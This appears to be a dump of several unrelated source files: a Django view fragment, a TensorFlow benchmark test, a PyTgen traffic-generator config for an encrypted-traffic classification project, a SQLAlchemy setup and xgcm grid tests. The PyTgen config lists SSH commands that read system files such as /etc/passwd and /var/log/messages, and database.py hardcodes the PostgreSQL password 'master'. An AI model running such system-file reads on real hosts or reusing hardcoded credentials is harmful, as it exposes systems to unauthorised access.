# {'dashboard_bookings' : dashboard_bookings})
incharge_name = HoldsDesignation.objects.get(designation__name = "VhIncharge")
# notify incharge about forwarded booking
visitors_hostel_notif(request.user, incharge_name.user, 'booking_forwarded')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/') | 44.322234 | 551 | 0.599821 |
4a1f439900b9d7b922e727721943eff86fadfec5 | 24 | py | Python | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | null | null | null | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | null | null | null | test/__init__.py | alphagov/service-manager | fa507758b5376a528658f32728427407fe87aaf3 | [
"Apache-2.0"
] | 2 | 2019-08-29T11:38:05.000Z | 2021-04-10T20:07:03.000Z | __author__ = 'vsharman'
| 12 | 23 | 0.75 |
4a1f44511dbe83789502f175ada52ff603363b14 | 2,058 | py | Python | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | 2 | 2021-08-30T14:12:09.000Z | 2022-01-20T02:14:22.000Z | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | null | null | null | Liquid-job-benchmarks/scripts/tf_cnn_benchmarks/all_reduce_benchmark_test.py | PasaLab/YAO | 2e70203197cd79f9522d65731ee5dc0eb236b005 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for all_reduce_benchmark.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import all_reduce_benchmark
import benchmark_cnn
import test_util
class AllReduceBenchmarkTest(tf.test.TestCase):
"""Tests the all-reduce benchmark."""
def _test_run_benchmark(self, params):
"""Tests that run_benchmark() runs successfully with the params."""
logs = []
with test_util.monkey_patch(all_reduce_benchmark,
log_fn=test_util.print_and_add_to_list(logs)):
bench_cnn = benchmark_cnn.BenchmarkCNN(params)
all_reduce_benchmark.run_benchmark(bench_cnn, num_iters=5)
self.assertRegex(logs[-1], '^Average time per step: [0-9.]+$')
def test_run_benchmark(self):
"""Tests that run_benchmark() runs successfully."""
params = benchmark_cnn.make_params(num_batches=10,
variable_update='replicated',
num_gpus=2)
self._test_run_benchmark(params)
params = params._replace(hierarchical_copy=True, gradient_repacking=8,
num_gpus=8)
self._test_run_benchmark(params)
if __name__ == '__main__':
tf.disable_v2_behavior()
tf.test.main()
| 38.830189 | 81 | 0.664723 |
4a1f4458dd00aba852b2c48a6aae722ff94339c1 | 6,736 | py | Python | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 35 | 2018-05-25T16:48:23.000Z | 2022-03-15T14:35:07.000Z | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 3 | 2018-03-18T13:03:09.000Z | 2020-01-17T12:09:12.000Z | trafficgen/PyTgen/config.py | SalikLP/classification-of-encrypted-traffic | 3c86e098aab58941f9339bb64945c1112ab556ef | [
"MIT"
] | 14 | 2018-05-25T16:48:24.000Z | 2022-01-04T12:56:31.000Z | '''
Config file adaptation/modification of the PyTgen generator config.py
'''
import logging
#
# This is a default configuration for the classification of encrypted traffic project
#
class Conf(object):
# maximum number of worker threads that can be used to execute the jobs.
# the program will start using 3 threads and spawn new ones if needed.
# this setting depends on the number of jobs that have to be executed
# simultaneously (not the number of jobs given in the config file).
maxthreads = 15
# set to "logging.INFO" or "logging.DEBUG"
loglevel = logging.DEBUG
# ssh commands that will be randomly executed by the ssh traffic generator
ssh_commands = ['ls', 'cd', 'cd /etc', 'ps ax', 'date', 'mount', 'free', 'vmstat',
'touch /tmp/tmpfile', 'rm /tmp/tmpfile', 'ls /tmp/tmpfile',
'tail /etc/hosts', 'tail /etc/passwd', 'tail /etc/fstab',
'cat /var/log/messages', 'cat /etc/group', 'cat /etc/mtab']
# urls the http generator will randomly fetch from
https_urls = ['https://www.dr.dk/', 'https://da.wikipedia.org/wiki/Forside',
'https://en.wikipedia.org/wiki/Main_Page', 'https://www.dk-hostmaster.dk/',
'https://www.cph.dk/', 'https://translate.google.com/', 'https://www.borger.dk/',
'https://www.sdu.dk/da/', 'https://www.sundhed.dk/', 'https://www.facebook.com/',
'https://www.ug.dk/', 'https://erhvervsstyrelsen.dk/', 'https://www.nets.eu/dk-da',
'https://www.jobindex.dk/', 'https://www.rejseplanen.dk/webapp/index.html', 'https://yousee.dk/',
'https://www.sparnord.dk/', 'https://gigahost.dk/', 'https://www.information.dk/',
'https://stps.dk/', 'https://www.skat.dk/', 'https://danskebank.dk/privat', 'https://www.sst.dk/']
http_urls = ['http://naturstyrelsen.dk/', 'http://www.valutakurser.dk/', 'http://ordnet.dk/ddo/forside',
'http://www.speedtest.net/', 'http://bygningsreglementet.dk/', 'http://www.ft.dk/', 'http://tv2.dk/',
'http://www.kl.dk/', 'http://www.symbiosis.dk/', 'http://www.noegletal.dk/',
'http://novonordiskfonden.dk/da', 'http://frida.fooddata.dk/',
'http://www.arbejdsmiljoforskning.dk/da', 'http://www.su.dk/', 'http://www.trafikstyrelsen.dk/da.aspx',
'http://www.regioner.dk/', 'http://www.geus.dk/UK/Pages/default.aspx', 'http://bm.dk/',
'http://www.m.dk/#!/', 'http://www.regionsjaelland.dk/Sider/default.aspx',
'http://www.trafikstyrelsen.dk/da.aspx']
# http_intern = ['http://web.intern.ndsec']
# a number of files that will randomly be used for ftp upload
ftp_put = ['~/files/file%s' % i for i in range(0, 9)]
# a number of files that will randomly be used for ftp download
ftp_get = ['~/files/file%s' % i for i in range(0, 9)]
# array of source-destination tuples for sftp upload
sftp_put = [('~/files/file%s' % i, '/tmp/file%s' % i) for i in range(0, 9)]
# array of source-destination tuples for sftp download
sftp_get = [('/media/share/files/file%s' % i, '~/files/tmp/file%s' % i) for i in range(0, 9)]
# significant part of the shell prompt to be able to recognize
# the end of a telnet data transmission
telnet_prompt = "$ "
# job configuration (see config.example.py)
jobdef = [
# http (intern)
# ('http_gen', [(start_hour, start_min), (end_hour, end_min), (interval_min, interval_sec)], [urls, retry, sleep_multiply])
# ('http_gen', [(9, 0), (16, 30), (60, 0)], [http_intern, 2, 30]),
# ('http_gen', [(9, 55), (9, 30), (5, 0)], [http_intern, 5, 20]),
# ('http_gen', [(12, 0), (12, 30), (2, 0)], [http_intern, 6, 10]),
# ('http_gen', [(10, 50), (12, 0), (10, 0)], [http_intern, 2, 10]),
# ('http_gen', [(15, 0), (17, 30), (30, 0)], [http_intern, 8, 20]),
#
# http (extern)
# ('http_gen', [(12, 0), (12, 30), (5, 0)], [http_extern, 10, 20]),
# ('http_gen', [(9, 0), (17, 0), (30, 0)], [http_extern, 5, 30]),
('http_gen', [(11, 0), (13, 0), (0, 10)], [http_urls, 1, 5]),
('http_gen', [(11, 0), (13, 0), (0, 10)], [https_urls, 1, 5]),
# ('http_gen', [(9, 0), (17, 0), (90, 0)], [http_extern, 10, 30]),
# ('http_gen', [(12, 0), (12, 10), (5, 0)], [http_extern, 15, 20]),
#
# smtp
# ('smtp_gen', [(9, 0), (18, 0), (120, 0)], ['mail.extern.ndsec', 'mail2', 'mail', '[email protected]', '[email protected]']),
# ('smtp_gen', [(12, 0), (13, 0), (30, 0)], ['mail.extern.ndsec', 'mail20', 'mail', '[email protected]', '[email protected]']),
#
# ftp
# ('ftp_gen', [(9, 0), (11, 0), (15, 0)], ['ftp.intern.ndsec', 'ndsec', 'ndsec', ftp_put, ftp_get, 10, False, 5]),
# ('ftp_gen', [(10, 0), (18, 0), (135, 0)], ['ftp.intern.ndsec', 'ndsec', 'ndsec', ftp_put, [], 2, False]),
#
# nfs / smb
# ('copy_gen', [(9, 0), (12, 0), (90, 0)], [None, 'Z:/tmp/dummyfile.txt', 30]),
# ('copy_gen', [(10, 0), (16, 0), (120, 0)], [None, 'Z:/tmp/dummyfile.txt', 80]),
# ('copy_gen', [(12, 0), (17, 0), (160, 0)], [None, 'Z:/tmp/dummyfile.txt', 180]),
# ('copy_gen', [(9, 0), (18, 0), (0, 10)], ['file1', 'file2']),
#
# telnet
# ('telnet_gen', [(9, 0), (18, 0), (60, 0)], ['telnet.intern.ndsec', None, 'ndsec', 'ndsec', 5, ssh_commands, telnet_prompt, 10]),
# ('telnet_gen', [(9, 0), (18, 0), (240, 0)], ['telnet.intern.ndsec', 23, 'ndsec', 'ndsec', 2, [], telnet_prompt]),
# ('telnet_gen', [(16, 0), (18, 0), (120, 0)], ['telnet.intern.ndsec', 23, 'ndsec', 'wrongpass', 2, [], telnet_prompt]),
#
# ssh
# ('ssh_gen', [(9, 0), (18, 0), (120, 0)], ['ssh.intern.ndsec', 22, 'ndsec', 'ndsec', 10, ssh_commands]),
# ('ssh_gen', [(9, 0), (18, 0), (240, 0)], ['ssh.intern.ndsec', 22, 'ndsec', 'ndsec', 60, [], 30]),
# ('ssh_gen', [(9, 0), (18, 0), (120, 0)], ['192.168.10.50', 22, 'dummy1', 'dummy1', 5, ssh_commands]),
# ('ssh_gen', [(12, 0), (14, 0), (120, 0)], ['ssh.intern.ndsec', 22, 'dummy1', 'wrongpass', 5, ssh_commands]),
#
# sftp
# ('sftp_gen', [(17, 0), (18, 0), (60, 0)], ['127.0.0.1', 22, 'user', 'pass', sftp_put, sftp_get, 5, 1]),
] | 62.37037 | 155 | 0.513955 |
4a1f44dcd6c5b6007f9a3c5361a2f8d6bbe47df0 | 630 | py | Python | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | 1 | 2016-08-06T03:10:16.000Z | 2016-08-06T03:10:16.000Z | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | null | null | null | database.py | FissionCat/cherrypy-practice | a35d78d770109731dd5b0f63d088e8ed6405106f | [
"MIT"
] | null | null | null | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Session = sessionmaker()
engine = create_engine("postgresql+pg8000://postgres:master@localhost/cherrypy", echo=True)
Session.configure(bind=engine)
Base = declarative_base()
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
username = Column(String)
fullname = Column(String)
password = Column(String)
def __init__(self, username, fullname, password):
self.username = username
self.fullname = fullname
self.password = password
Base.metadata.create_all(engine) | 27.391304 | 91 | 0.780952 |
4a1f44fe436231ecd984d7d7005440a7e7bf09f1 | 28,112 | py | Python | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | 1 | 2021-07-03T14:07:47.000Z | 2021-07-03T14:07:47.000Z | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | null | null | null | xgcm/test/test_grid.py | albernsrya/xgcm | 9bd495bbfc14a0c9e68cce880e2303c7c744d2c8 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
import xarray as xr
from xgcm.grid import Axis, Grid
from .datasets import all_2d # noqa: F401
from .datasets import all_datasets # noqa: F401
from .datasets import datasets # noqa: F401
from .datasets import datasets_grid_metric # noqa: F401
from .datasets import nonperiodic_1d # noqa: F401
from .datasets import nonperiodic_2d # noqa: F401
from .datasets import periodic_1d # noqa: F401
from .datasets import periodic_2d # noqa: F401
# helper function to produce axes from datasets
def _get_axes(ds):
all_axes = {ds[c].attrs["axis"] for c in ds.dims if "axis" in ds[c].attrs}
axis_objs = {ax: Axis(ds, ax) for ax in all_axes}
return axis_objs
@pytest.mark.parametrize("discontinuity", [None, 10, 360])
@pytest.mark.parametrize("right", [True, False])
def test_extend_right_left(discontinuity, right):
ds = datasets["1d_left"]
axis = Axis(ds, "X")
if discontinuity is None:
ref = 0
else:
ref = discontinuity
kw = {"boundary_discontinuity": discontinuity}
if right:
extended_raw = axis._extend_right(ds.XC, **kw)
extended = extended_raw[-1]
expected = ds.XC.data[0] + ref
else:
extended_raw = axis._extend_left(ds.XC, **kw)
extended = extended_raw[0]
expected = ds.XC.data[-1] - ref
assert isinstance(extended_raw, np.ndarray)
assert extended == expected
@pytest.mark.parametrize("fill_value", [0, 10, 20])
@pytest.mark.parametrize("boundary", ["fill", "extend", "extrapolate"])
@pytest.mark.parametrize("periodic", [True, False])
@pytest.mark.parametrize("is_left_edge", [True, False])
@pytest.mark.parametrize("boundary_discontinuity", [None, 360])
def test_get_edge_data(
periodic, fill_value, boundary, is_left_edge, boundary_discontinuity
):
ds = datasets["1d_left"]
axis = Axis(ds, "X", periodic=periodic)
edge = axis._get_edge_data(
ds.XC,
boundary=boundary,
fill_value=fill_value,
is_left_edge=is_left_edge,
boundary_discontinuity=boundary_discontinuity,
)
if is_left_edge:
edge_periodic = ds.XC.data[-1]
if boundary_discontinuity is not None:
edge_periodic = edge_periodic - boundary_discontinuity
edge_extend = ds.XC.data[0]
edge_extra = ds.XC.data[0] - np.diff(ds.XC.data[0:2])
else:
edge_periodic = ds.XC.data[0]
if boundary_discontinuity is not None:
edge_periodic = edge_periodic + boundary_discontinuity
edge_extend = ds.XC.data[-1]
edge_extra = ds.XC.data[-1] + np.diff(ds.XC.data[-2:])
edge_fill = fill_value
if periodic:
assert edge_periodic == edge
else:
if boundary == "fill":
assert edge_fill == edge
elif boundary == "extend":
assert edge_extend == edge
elif boundary == "extrapolate":
assert edge_extra == edge
else:
assert 0
def test_create_axis(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_expected, coords_expected in expected["axes"].items():
assert ax_expected in axis_objs
this_axis = axis_objs[ax_expected]
for axis_name, coord_name in coords_expected.items():
assert axis_name in this_axis.coords
assert this_axis.coords[axis_name] == coord_name
def _assert_axes_equal(ax1, ax2):
assert ax1.name == ax2.name
for pos, coord in ax1.coords.items():
assert pos in ax2.coords
assert coord == ax2.coords[pos]
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
# TODO: make this work...
# assert ax1._connections == ax2._connections
def test_create_axis_no_comodo(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
# now strip out the metadata
ds_noattr = ds.copy()
for var in ds.variables:
ds_noattr[var].attrs.clear()
for axis_name, axis_coords in expected["axes"].items():
# now create the axis from scratch with no attributes
ax2 = Axis(ds_noattr, axis_name, coords=axis_coords)
# and compare to the one created with attributes
ax1 = axis_objs[axis_name]
assert ax1.name == ax2.name
for pos, coord_name in ax1.coords.items():
assert pos in ax2.coords
assert coord_name == ax2.coords[pos]
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
def test_create_axis_no_coords(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
ds_drop = ds.drop_vars(list(ds.coords))
for axis_name, axis_coords in expected["axes"].items():
# now create the axis from scratch with no attributes OR coords
ax2 = Axis(ds_drop, axis_name, coords=axis_coords)
# and compare to the one created with attributes
ax1 = axis_objs[axis_name]
assert ax1.name == ax2.name
for pos, coord in ax1.coords.items():
assert pos in ax2.coords
assert ax1._periodic == ax2._periodic
assert ax1._default_shifts == ax2._default_shifts
assert ax1._facedim == ax2._facedim
def test_axis_repr(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_name, axis in axis_objs.items():
r = repr(axis).split("\n")
assert r[0].startswith("<xgcm.Axis")
# TODO: make this more complete
def test_get_axis_coord(all_datasets):
ds, periodic, expected = all_datasets
axis_objs = _get_axes(ds)
for ax_name, axis in axis_objs.items():
# create a dataarray with each axis coordinate
for position, coord in axis.coords.items():
da = 1 * ds[coord]
assert axis._get_axis_coord(da) == (position, coord)
def test_axis_wrap_and_replace_2d(periodic_2d):
ds, periodic, expected = periodic_2d
axis_objs = _get_axes(ds)
da_xc_yc = 0 * ds.XC * ds.YC + 1
da_xc_yg = 0 * ds.XC * ds.YG + 1
da_xg_yc = 0 * ds.XG * ds.YC + 1
da_xc_yg_test = axis_objs["Y"]._wrap_and_replace_coords(
da_xc_yc, da_xc_yc.data, "left"
)
assert da_xc_yg.equals(da_xc_yg_test)
da_xg_yc_test = axis_objs["X"]._wrap_and_replace_coords(
da_xc_yc, da_xc_yc.data, "left"
)
assert da_xg_yc.equals(da_xg_yc_test)
def test_axis_wrap_and_replace_nonperiodic(nonperiodic_1d):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X")
da_c = 0 * ds.XC + 1
da_g = 0 * ds.XG + 1
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
da_g_test = axis._wrap_and_replace_coords(da_c, da_g.data, to)
assert da_g.equals(da_g_test)
da_c_test = axis._wrap_and_replace_coords(da_g, da_c.data, "center")
assert da_c.equals(da_c_test)
# helper functions for padding arrays
# this feels silly...I'm basically just re-coding the function in order to
# test it
def _pad_left(data, boundary, fill_value=0.0):
pad_val = data[0] if boundary == "extend" else fill_value
return np.hstack([pad_val, data])
def _pad_right(data, boundary, fill_value=0.0):
pad_val = data[-1] if boundary == "extend" else fill_value
return np.hstack([data, pad_val])
@pytest.mark.parametrize(
"boundary",
[None, "extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)],
)
@pytest.mark.parametrize("from_center", [True, False])
def test_axis_neighbor_pairs_nonperiodic_1d(nonperiodic_1d, boundary, from_center):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
# detect whether this is an outer or inner case
# outer --> dim_line_diff = 1
# inner --> dim_line_diff = -1
dim_len_diff = len(ds.XG) - len(ds.XC)
if from_center:
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
da = ds.data_c
else:
to = "center"
da = ds.data_g
shift = expected.get("shift") or False
# need boundary condition for everything but outer to center
if (boundary is None) and (
dim_len_diff == 0
or (dim_len_diff == 1 and from_center)
or (dim_len_diff == -1 and not from_center)
):
with pytest.raises(ValueError):
data_left, data_right = axis._get_neighbor_data_pairs(
da, to, boundary=boundary
)
else:
data_left, data_right = axis._get_neighbor_data_pairs(da, to, boundary=boundary)
if ((dim_len_diff == 1) and not from_center) or (
(dim_len_diff == -1) and from_center
):
expected_left = da.data[:-1]
expected_right = da.data[1:]
elif ((dim_len_diff == 1) and from_center) or (
(dim_len_diff == -1) and not from_center
):
expected_left = _pad_left(da.data, boundary)
expected_right = _pad_right(da.data, boundary)
elif (shift and not from_center) or (not shift and from_center):
expected_right = da.data
expected_left = _pad_left(da.data, boundary)[:-1]
else:
expected_left = da.data
expected_right = _pad_right(da.data, boundary)[1:]
np.testing.assert_allclose(data_left, expected_left)
np.testing.assert_allclose(data_right, expected_right)
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
def test_axis_cumsum(nonperiodic_1d, boundary):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
axis_expected = expected["axes"]["X"]
cumsum_g = axis.cumsum(ds.data_g, to="center", boundary=boundary)
assert cumsum_g.dims == ds.data_c.dims
# check default "to"
assert cumsum_g.equals(axis.cumsum(ds.data_g, boundary=boundary))
to = set(axis_expected).difference({"center"}).pop()
cumsum_c = axis.cumsum(ds.data_c, to=to, boundary=boundary)
assert cumsum_c.dims == ds.data_g.dims
# check default "to"
assert cumsum_c.equals(axis.cumsum(ds.data_c, boundary=boundary))
cumsum_c_raw = np.cumsum(ds.data_c.data)
cumsum_g_raw = np.cumsum(ds.data_g.data)
if to == "right":
np.testing.assert_allclose(cumsum_c.data, cumsum_c_raw)
fill_value = 0.0 if boundary == "fill" else cumsum_g_raw[0]
np.testing.assert_allclose(
cumsum_g.data, np.hstack([fill_value, cumsum_g_raw[:-1]])
)
elif to == "left":
np.testing.assert_allclose(cumsum_g.data, cumsum_g_raw)
fill_value = 0.0 if boundary == "fill" else cumsum_c_raw[0]
np.testing.assert_allclose(
cumsum_c.data, np.hstack([fill_value, cumsum_c_raw[:-1]])
)
elif to == "inner":
np.testing.assert_allclose(cumsum_c.data, cumsum_c_raw[:-1])
fill_value = 0.0 if boundary == "fill" else cumsum_g_raw[0]
np.testing.assert_allclose(cumsum_g.data, np.hstack([fill_value, cumsum_g_raw]))
elif to == "outer":
np.testing.assert_allclose(cumsum_g.data, cumsum_g_raw[:-1])
fill_value = 0.0 if boundary == "fill" else cumsum_c_raw[0]
np.testing.assert_allclose(cumsum_c.data, np.hstack([fill_value, cumsum_c_raw]))
# not much point doing this...we don't have the right test datasets
# to really test the errors
# other_positions = {'left', 'right', 'inner', 'outer'}.difference({to})
# for pos in other_positions:
# with pytest.raises(KeyError):
# axis.cumsum(ds.data_c, to=pos, boundary=boundary)
@pytest.mark.parametrize(
"varname, axis_name, to, roll, roll_axis, swap_order",
[
("data_c", "X", "left", 1, 1, False),
("data_c", "Y", "left", 1, 0, False),
("data_g", "X", "center", -1, 1, True),
("data_g", "Y", "center", -1, 0, True),
],
)
def test_axis_neighbor_pairs_2d(
periodic_2d, varname, axis_name, to, roll, roll_axis, swap_order
):
ds, _, _ = periodic_2d
axis = Axis(ds, axis_name)
data = ds[varname]
data_left, data_right = axis._get_neighbor_data_pairs(data, to)
if swap_order:
data_left, data_right = data_right, data_left
np.testing.assert_allclose(data_left, np.roll(data.data, roll, axis=roll_axis))
np.testing.assert_allclose(data_right, data.data)
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
@pytest.mark.parametrize("from_center", [True, False])
def test_axis_diff_and_interp_nonperiodic_1d(nonperiodic_1d, boundary, from_center):
ds, periodic, expected = nonperiodic_1d
axis = Axis(ds, "X", periodic=periodic)
dim_len_diff = len(ds.XG) - len(ds.XC)
if from_center:
to = (set(expected["axes"]["X"].keys()) - {"center"}).pop()
coord_to = "XG"
da = ds.data_c
else:
to = "center"
coord_to = "XC"
da = ds.data_g
shift = expected.get("shift") or False
data = da.data
if (dim_len_diff == 1 and not from_center) or (dim_len_diff == -1 and from_center):
data_left = data[:-1]
data_right = data[1:]
elif (dim_len_diff == 1 and from_center) or (
dim_len_diff == -1 and not from_center
):
data_left = _pad_left(data, boundary)
data_right = _pad_right(data, boundary)
elif (shift and not from_center) or (not shift and from_center):
data_left = _pad_left(data[:-1], boundary)
data_right = data
else:
data_left = data
data_right = _pad_right(data[1:], boundary)
# interpolate
data_interp_expected = xr.DataArray(
0.5 * (data_left + data_right), dims=[coord_to], coords={coord_to: ds[coord_to]}
)
data_interp = axis.interp(da, to, boundary=boundary)
assert data_interp_expected.equals(data_interp)
# check without "to" specified
assert data_interp.equals(axis.interp(da, boundary=boundary))
# difference
data_diff_expected = xr.DataArray(
data_right - data_left, dims=[coord_to], coords={coord_to: ds[coord_to]}
)
data_diff = axis.diff(da, to, boundary=boundary)
assert data_diff_expected.equals(data_diff)
# check without "to" specified
assert data_diff.equals(axis.diff(da, boundary=boundary))
# max
data_max_expected = xr.DataArray(
np.maximum(data_right, data_left),
dims=[coord_to],
coords={coord_to: ds[coord_to]},
)
data_max = axis.max(da, to, boundary=boundary)
assert data_max_expected.equals(data_max)
# check without "to" specified
assert data_max.equals(axis.max(da, boundary=boundary))
# min
data_min_expected = xr.DataArray(
np.minimum(data_right, data_left),
dims=[coord_to],
coords={coord_to: ds[coord_to]},
)
data_min = axis.min(da, to, boundary=boundary)
assert data_min_expected.equals(data_min)
# check without "to" specified
assert data_min.equals(axis.min(da, boundary=boundary))
# this mega test covers all options for 2D data
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
@pytest.mark.parametrize("axis_name", ["X", "Y"])
@pytest.mark.parametrize(
"varname, this, to", [("data_c", "center", "left"), ("data_g", "left", "center")]
)
def test_axis_diff_and_interp_nonperiodic_2d(
all_2d, boundary, axis_name, varname, this, to
):
ds, periodic, _ = all_2d
try:
ax_periodic = axis_name in periodic
except TypeError:
ax_periodic = periodic
boundary_arg = boundary if not ax_periodic else None
axis = Axis(ds, axis_name, periodic=ax_periodic, boundary=boundary_arg)
da = ds[varname]
# everything is left shift
data = ds[varname].data
axis_num = da.get_axis_num(axis.coords[this])
# lookups for numpy.pad
numpy_pad_arg = {"extend": "edge", "fill": "constant"}
# args for numpy.pad
pad_left = (1, 0)
pad_right = (0, 1)
pad_none = (0, 0)
if this == "center":
if ax_periodic:
data_left = np.roll(data, 1, axis=axis_num)
else:
pad_width = [
pad_left if i == axis_num else pad_none for i in range(data.ndim)
]
the_slice = tuple(
[
slice(0, -1) if i == axis_num else slice(None)
for i in range(data.ndim)
]
)
data_left = np.pad(data, pad_width, numpy_pad_arg[boundary])[the_slice]
data_right = data
elif this == "left":
if ax_periodic:
data_left = data
data_right = np.roll(data, -1, axis=axis_num)
else:
pad_width = [
pad_right if i == axis_num else pad_none for i in range(data.ndim)
]
the_slice = tuple(
[
slice(1, None) if i == axis_num else slice(None)
for i in range(data.ndim)
]
)
data_right = np.pad(data, pad_width, numpy_pad_arg[boundary])[the_slice]
data_left = data
data_interp = 0.5 * (data_left + data_right)
data_diff = data_right - data_left
# determine new dims
dims = list(da.dims)
dims[axis_num] = axis.coords[to]
coords = {dim: ds[dim] for dim in dims}
da_interp_expected = xr.DataArray(data_interp, dims=dims, coords=coords)
da_diff_expected = xr.DataArray(data_diff, dims=dims, coords=coords)
da_interp = axis.interp(da, to)
da_diff = axis.diff(da, to)
assert da_interp_expected.equals(da_interp)
assert da_diff_expected.equals(da_diff)
if boundary_arg is not None:
if boundary == "extend":
bad_boundary = "fill"
elif boundary == "fill":
bad_boundary = "extend"
da_interp_wrong = axis.interp(da, to, boundary=bad_boundary)
assert not da_interp_expected.equals(da_interp_wrong)
da_diff_wrong = axis.diff(da, to, boundary=bad_boundary)
assert not da_diff_expected.equals(da_diff_wrong)
def test_axis_errors():
ds = datasets["1d_left"]
ds_noattr = ds.copy()
del ds_noattr.XC.attrs["axis"]
with pytest.raises(
ValueError, match="Couldn't find a center coordinate for axis X"
):
_ = Axis(ds_noattr, "X", periodic=True)
del ds_noattr.XG.attrs["axis"]
with pytest.raises(ValueError, match="Couldn't find any coordinates for axis X"):
_ = Axis(ds_noattr, "X", periodic=True)
ds_chopped = ds.copy().isel(XG=slice(None, 3))
del ds_chopped["data_g"]
with pytest.raises(ValueError, match="coordinate XG has incompatible length"):
_ = Axis(ds_chopped, "X", periodic=True)
ds_chopped.XG.attrs["c_grid_axis_shift"] = -0.5
with pytest.raises(ValueError, match="coordinate XG has incompatible length"):
_ = Axis(ds_chopped, "X", periodic=True)
del ds_chopped.XG.attrs["c_grid_axis_shift"]
with pytest.raises(
ValueError,
match="Found two coordinates without `c_grid_axis_shift` attribute for axis X",
):
_ = Axis(ds_chopped, "X", periodic=True)
ax = Axis(ds, "X", periodic=True)
with pytest.raises(
ValueError, match="Can't get neighbor pairs for the same position."
):
ax.interp(ds.data_c, "center")
with pytest.raises(
ValueError, match="This axis doesn't contain a `right` position"
):
ax.interp(ds.data_c, "right")
# This case is broken, need to fix!
# with pytest.raises(
# ValueError, match="`boundary=fill` is not allowed " "with periodic axis X."
# ):
# ax.interp(ds.data_c, "left", boundary="fill")
@pytest.mark.parametrize(
"boundary", [None, "fill", "extend", "extrapolate", {"X": "fill", "Y": "extend"}]
)
@pytest.mark.parametrize("fill_value", [None, 0, 1.0])
def test_grid_create(all_datasets, boundary, fill_value):
ds, periodic, expected = all_datasets
grid = Grid(ds, periodic=periodic)
assert grid is not None
for ax in grid.axes.values():
assert ax.boundary is None
grid = Grid(ds, periodic=periodic, boundary=boundary, fill_value=fill_value)
for name, ax in grid.axes.items():
if isinstance(boundary, dict):
expected = boundary.get(name)
else:
expected = boundary
assert ax.boundary == expected
if fill_value is None:
expected = 0.0
elif isinstance(fill_value, dict):
expected = fill_value.get(name)
else:
expected = fill_value
assert ax.fill_value == expected
def test_create_grid_no_comodo(all_datasets):
ds, periodic, expected = all_datasets
grid_expected = Grid(ds, periodic=periodic)
ds_noattr = ds.copy()
for var in ds.variables:
ds_noattr[var].attrs.clear()
coords = expected["axes"]
grid = Grid(ds_noattr, periodic=periodic, coords=coords)
for axis_name_expected in grid_expected.axes:
axis_expected = grid_expected.axes[axis_name_expected]
axis_actual = grid.axes[axis_name_expected]
_assert_axes_equal(axis_expected, axis_actual)
def test_grid_no_coords(periodic_1d):
ds, periodic, expected = periodic_1d
ds_nocoords = ds.drop_dims(list(ds.dims.keys()))
coords = expected["axes"]
grid = Grid(ds_nocoords, periodic=periodic, coords=coords)
diff = grid.diff(ds["data_c"], "X")
assert len(diff.coords) == 0
interp = grid.interp(ds["data_c"], "X")
assert len(interp.coords) == 0
def test_grid_repr(all_datasets):
ds, periodic, _ = all_datasets
grid = Grid(ds, periodic=periodic)
r = repr(grid).split("\n")
assert r[0] == "<xgcm.Grid>"
def test_grid_ops(all_datasets):
"""
Check that we get the same answer using Axis or Grid objects
"""
